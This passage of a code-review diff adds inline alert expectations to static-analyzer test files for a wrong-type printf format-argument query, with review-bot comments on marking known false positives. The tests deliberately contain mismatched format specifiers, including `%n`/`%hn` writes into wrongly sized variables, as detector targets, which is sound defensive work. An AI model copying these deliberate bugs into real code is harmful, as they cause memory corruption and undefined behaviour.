PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h index 60ee2c8caade..6b2151e013b1 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/printf1.h 
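Review bot: The second `error(...)` call in `format2` now carries a bare `// $ Alert` with no GOOD/BAD explanation, unlike the annotated lines in the sibling headers. A short reason before the expectation would make the intent reviewable, e.g. `// BAD: str, i, d do not match %d %f %s // $ Alert`, and the first call could be marked `// GOOD`. Since all three trailing arguments appear mismatched, it is also worth confirming that a single `Alert` expectation is meant to cover every result the query reports on that line. The signature of `error` is only partly visible in the hunk header, so the position of the format parameter is inferred from the two calls. The same applies to the format.h hunks in the Microsoft and Microsoft_no_wchar directories.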
@@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } 
@@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } typedef unsigned int wint_t; @@ -165,8 +165,8 @@ void fun4() long long ll; unsigned long long ull; - printf("%qi\n", i); // BAD - printf("%qu\n", ui); // BAD + printf("%qi\n", i); // BAD // $ Alert + printf("%qu\n", ui); // BAD // $ Alert printf("%qi\n", l); // GOOD printf("%qu\n", ul); // GOOD printf("%qi\n", ll); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h index eefb84993e74..6e592a95dc04 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } 
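Review bot: In the `fun3` hunk, `printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert` records a known spurious result with the same plain `Alert` tag as the true positives, so the expectation no longer distinguishes a wanted alert from a tolerated one. If the `SPURIOUS:` prefix of the inline-expectations library is available here, `// GOOD // $ SPURIOUS: Alert` would keep the test passing today and flag the line once the query stops reporting it. The same applies to the `printf("%zd", ptr_a - ptr_b)` line in the `g` hunks and to the `%p` line in the `fun3` hunks of the Microsoft and Microsoft_no_wchar printf1.h files. The body of `fun3` begins outside the hunk.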
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h index 73bdee5b8b11..65042f843003 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Linux_unsigned_chars/wide_string.h @@ -22,7 +22,7 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/format.h 
@@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h index 2fb361d485c5..80e8b74d9a33 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/printf1.h 
@@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] @@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } 
@@ -59,20 +59,20 @@ void g() const SIZE_T C_ST = sizeof(st); ssize_t sst; - printf("%zu", ul); // not ok + printf("%zu", ul); // not ok // $ Alert printf("%zu", st); // ok printf("%zu", ST); // ok printf("%zu", c_st); // ok printf("%zu", C_ST); // ok printf("%zu", sizeof(ul)); // ok - printf("%zu", sst); // not ok + printf("%zu", sst); // not ok // $ Alert printf("%zd", ul); // not ok [NOT DETECTED] - printf("%zd", st); // not ok - printf("%zd", ST); // not ok - printf("%zd", c_st); // not ok - printf("%zd", C_ST); // not ok - printf("%zd", sizeof(ul)); // not ok + printf("%zd", st); // not ok // $ Alert + printf("%zd", ST); // not ok // $ Alert + printf("%zd", c_st); // not ok // $ Alert + printf("%zd", C_ST); // not ok // $ Alert + printf("%zd", sizeof(ul)); // not ok // $ Alert printf("%zd", sst); // ok { char *ptr_a, *ptr_b; @@ -81,7 +81,7 @@ void g() printf("%tu", ptr_a - ptr_b); // ok printf("%td", ptr_a - ptr_b); // ok printf("%zu", ptr_a - ptr_b); // ok (dubious) - printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] + printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ Alert } } @@ -113,8 +113,8 @@ void fun2() { printf("%S", myString1); // GOOD printf("%S", myString2); // GOOD - printf("%S", myString3); // BAD - printf("%S", myString4); // BAD + printf("%S", myString3); // BAD // $ Alert + printf("%S", myString4); // BAD // $ Alert } typedef void *VOIDPTR; @@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } typedef unsigned int wint_t; 
@@ -178,21 +178,21 @@ void fun4() printf("%I32u\n", ui); // GOOD printf("%I32i\n", l); // GOOD printf("%I32u\n", ul); // GOOD - printf("%I32i\n", ll); // BAD - printf("%I32u\n", ull); // BAD + printf("%I32i\n", ll); // BAD // $ Alert + printf("%I32u\n", ull); // BAD // $ Alert printf("%I32i\n", i32); // GOOD printf("%I32u\n", u32); // GOOD - printf("%I32i\n", i64); // BAD - printf("%I32u\n", u64); // BAD + printf("%I32i\n", i64); // BAD // $ Alert + printf("%I32u\n", u64); // BAD // $ Alert - printf("%I64i\n", i); // BAD - printf("%I64u\n", ui); // BAD - printf("%I64i\n", l); // BAD - printf("%I64u\n", ul); // BAD + printf("%I64i\n", i); // BAD // $ Alert + printf("%I64u\n", ui); // BAD // $ Alert + printf("%I64i\n", l); // BAD // $ Alert + printf("%I64u\n", ul); // BAD // $ Alert printf("%I64i\n", ll); // GOOD printf("%I64u\n", ull); // GOOD - printf("%I64i\n", i32); // BAD - printf("%I64u\n", u32); // BAD + printf("%I64i\n", i32); // BAD // $ Alert + printf("%I64u\n", u32); // BAD // $ Alert printf("%I64i\n", i64); // GOOD printf("%I64u\n", u64); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h index e88d0318bb05..9eb5fd0bb23c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/real_world.h 
@@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h index 672329b62706..3f9abeb01824 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft/wide_string.h @@ -22,9 +22,9 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD - printf("%wc", L"c"); // BAD + printf("%wc", L"c"); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref index 6f557ace55a5..370dae334d68 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref 
+++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/WrongTypeFormatArguments.qlref @@ -1 +1,2 @@ -Likely Bugs/Format/WrongTypeFormatArguments.ql +query: Likely Bugs/Format/WrongTypeFormatArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h index 889dd2f58c8c..e5421e760a37 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/format.h @@ -13,5 +13,5 @@ static void error(int x1, int x2, int x3, int x4, int x5, void format2(char *str, int i, double d) { error(1, 2, 3, 4, 5, "%s %d %f", 1, 2, 3, 4, 5, 6, 7, str, i, d); - error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); + error(1, 2, 3, 4, 5, "%d %f %s", 1, 2, 3, 4, 5, 6, 7, str, i, d); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h index 782ee23faf30..2222b7e42518 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/pri_macros.h @@ -12,5 +12,5 @@ void test_PRI_macros() { printf("my_u64 = %" PRIu64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIx64 "\n", my_u64); // GOOD printf("my_u64 = %" PRIi64 "\n", my_u64); // BAD: uint64_t read as int64_t [NOT DETECTED] - printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t + printf("my_u64 = %" PRIu32 "\n", my_u64); // BAD: uint64_t read as uint32_t // $ Alert } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h index 8222cfa67b25..90fd490c9544 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/printf1.h @@ -9,22 +9,22 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char const char cc = 'x'; printf("%s: %d\n", s, i); // ok - printf("%s: %f\n", s, i); // not ok (int -> float) + printf("%s: %f\n", s, i); // not ok (int -> float) // $ Alert printf("%s", us); // ok printf("%s", cs); // ok printf("%s", ss); // ok printf("%p", cs); // ok - printf("%p", i); // not ok (int -> void *) + printf("%p", i); // not ok (int -> void *) // $ Alert printf("%p", &f); // ok printf("%*s", i, cs); // ok printf("%*s", mi, cs); // ok printf("%*s", c, cs); // ok printf("%*s", cc, cs); // ok - printf("%*s", i, i); // not ok (int -> char *) + printf("%*s", i, i); // not ok (int -> char *) // $ Alert printf("%d %% %*s", i, i, cs); // ok - printf("%*s", cs, cs); // not ok (the width argument should be integer) + printf("%*s", cs, cs); // not ok (the width argument should be integer) // $ Alert printf("%c", 10); // ok printf("%c", 1000); // not ok [NOT DETECTED] 
@@ -35,15 +35,15 @@ void f(char *s, int i, unsigned char *us, const char *cs, signed char *ss, char printf("%u", 1000); // ok printf("%i", MYONETHOUSAND); // ok - printf("%s", MYONETHOUSAND); // not ok (enum -> char *) + printf("%s", MYONETHOUSAND); // not ok (enum -> char *) // $ Alert printf("%c", MYONETHOUSAND); // not ok (enum -> char) [NOT DETECTED] printf("%i", mi); // ok printf("%u", mi); // not ok (int -> unsigned int) [NOT DETECTED] - printf("%d", ull); // not ok (unsigned long long -> int) - printf("%u", ull); // not ok (unsigned long long -> unsigned int) - printf("%x", ull); // not ok (unsigned long long -> unsigned int) + printf("%d", ull); // not ok (unsigned long long -> int) // $ Alert + printf("%u", ull); // not ok (unsigned long long -> unsigned int) // $ Alert + printf("%x", ull); // not ok (unsigned long long -> unsigned int) // $ Alert printf("%Lx", ull); // ok printf("%llx", ull); // ok } @@ -59,20 +59,20 @@ void g() const SIZE_T C_ST = sizeof(st); ssize_t sst; - printf("%zu", ul); // not ok + printf("%zu", ul); // not ok // $ Alert printf("%zu", st); // ok printf("%zu", ST); // ok printf("%zu", c_st); // ok printf("%zu", C_ST); // ok printf("%zu", sizeof(ul)); // ok - printf("%zu", sst); // not ok + printf("%zu", sst); // not ok // $ Alert printf("%zd", ul); // not ok [NOT DETECTED] - printf("%zd", st); // not ok - printf("%zd", ST); // not ok - printf("%zd", c_st); // not ok - printf("%zd", C_ST); // not ok - printf("%zd", sizeof(ul)); // not ok + printf("%zd", st); // not ok // $ Alert + printf("%zd", ST); // not ok // $ Alert + printf("%zd", c_st); // not ok // $ Alert + printf("%zd", C_ST); // not ok // $ Alert + printf("%zd", sizeof(ul)); // not ok // $ Alert printf("%zd", sst); // ok { char *ptr_a, *ptr_b; 
@@ -81,7 +81,7 @@ void g() printf("%tu", ptr_a - ptr_b); // ok printf("%td", ptr_a - ptr_b); // ok printf("%zu", ptr_a - ptr_b); // ok (dubious) - printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] + printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ Alert } } @@ -127,7 +127,7 @@ void fun3(void *p1, VOIDPTR p2, FUNPTR p3, char *p4) printf("%p\n", p3); // GOOD printf("%p\n", p4); // GOOD printf("%p\n", p4 + 1); // GOOD - printf("%p\n", 0); // GOOD [FALSE POSITIVE] + printf("%p\n", 0); // GOOD [FALSE POSITIVE] // $ Alert } void fun4() @@ -152,21 +152,21 @@ void fun4() printf("%I32u\n", ui); // GOOD printf("%I32i\n", l); // GOOD printf("%I32u\n", ul); // GOOD - printf("%I32i\n", ll); // BAD - printf("%I32u\n", ull); // BAD + printf("%I32i\n", ll); // BAD // $ Alert + printf("%I32u\n", ull); // BAD // $ Alert printf("%I32i\n", i32); // GOOD printf("%I32u\n", u32); // GOOD - printf("%I32i\n", i64); // BAD - printf("%I32u\n", u64); // BAD + printf("%I32i\n", i64); // BAD // $ Alert + printf("%I32u\n", u64); // BAD // $ Alert - printf("%I64i\n", i); // BAD - printf("%I64u\n", ui); // BAD - printf("%I64i\n", l); // BAD - printf("%I64u\n", ul); // BAD + printf("%I64i\n", i); // BAD // $ Alert + printf("%I64u\n", ui); // BAD // $ Alert + printf("%I64i\n", l); // BAD // $ Alert + printf("%I64u\n", ul); // BAD // $ Alert printf("%I64i\n", ll); // GOOD printf("%I64u\n", ull); // GOOD - printf("%I64i\n", i32); // BAD - printf("%I64u\n", u32); // BAD + printf("%I64i\n", i32); // BAD // $ Alert + printf("%I64u\n", u32); // BAD // $ Alert printf("%I64i\n", i64); // GOOD printf("%I64u\n", u64); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h index eefb84993e74..6e592a95dc04 100644 
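Review bot: `printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ Alert` annotates a result the comment itself calls wrong as an ordinary expected alert. The `SPURIOUS:` prefix tells the test harness the same thing the prose says: `printf("%zd", ptr_a - ptr_b); // ok (dubious) [FALSE POSITIVE] // $ SPURIOUS: Alert`. The same goes for `printf("%p\n", 0);` in the `@@ -127,7` hunk and for the two `[FALSE POSITIVE]` FILETIME lines of `checkedExample` in Adding365DaysPerYear/test.cpp. The enclosing block of this hunk opens above it.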
--- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/real_world.h @@ -58,9 +58,9 @@ void bar() printf("check %n", &i); // GOOD printf("check %n", &ui); // GOOD [dubious: int is written to unsigned int] printf("check %n", &si); // GOOD - printf("check %n", &s); // BAD: int is written to short - printf("check %hn", &i); // BAD: short is written to int - printf("check %hn", &ui); // BAD: short is written to unsigned int - printf("check %hn", &si); // BAD: short is written to signed int + printf("check %n", &s); // BAD: int is written to short // $ Alert + printf("check %hn", &i); // BAD: short is written to int // $ Alert + printf("check %hn", &ui); // BAD: short is written to unsigned int // $ Alert + printf("check %hn", &si); // BAD: short is written to signed int // $ Alert printf("check %hn", &s); // GOOD } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h index 672329b62706..3f9abeb01824 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Microsoft_no_wchar/wide_string.h @@ -22,9 +22,9 @@ void test_wchar4(char c, const char cc, wchar_t wc, const wchar_t wcc) { printf("%c", c); // GOOD printf("%c", cc); // GOOD printf("%c", 'c'); // GOOD - printf("%c", "c"); // BAD + printf("%c", "c"); // BAD // $ Alert printf("%wc", wc); // GOOD printf("%wc", wcc); // GOOD printf("%wc", L'c'); // GOOD - printf("%wc", L"c"); // BAD + printf("%wc", L"c"); // BAD // $ Alert } 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref index 8ede85c2d6fd..676a003f0585 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/InconsistentCheckReturnNull.qlref @@ -1 +1,2 @@ -Likely Bugs/InconsistentCheckReturnNull.ql +query: Likely Bugs/InconsistentCheckReturnNull.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c index 0f7887666df9..f2383982771b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/InconsistentCheckReturnNull/test.c @@ -26,7 +26,7 @@ void f() { int* x7 = maybe_null_func(); if (x7) *x7 = 0; - int* x8 = maybe_null_func(); + int* x8 = maybe_null_func(); // $ Alert *x8 = 0; int* x9 = maybe_null_func(); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref index 4420b542ca43..9352fe408e8c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/Adding365daysPerYear.qlref @@ -1 +1,2 @@ -Likely Bugs/Leap Year/Adding365DaysPerYear.ql +query: Likely Bugs/Leap Year/Adding365DaysPerYear.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Leap Year/Adding365DaysPerYear/test.cpp index a14667c75ca5..8fb6d8e01551 100644 
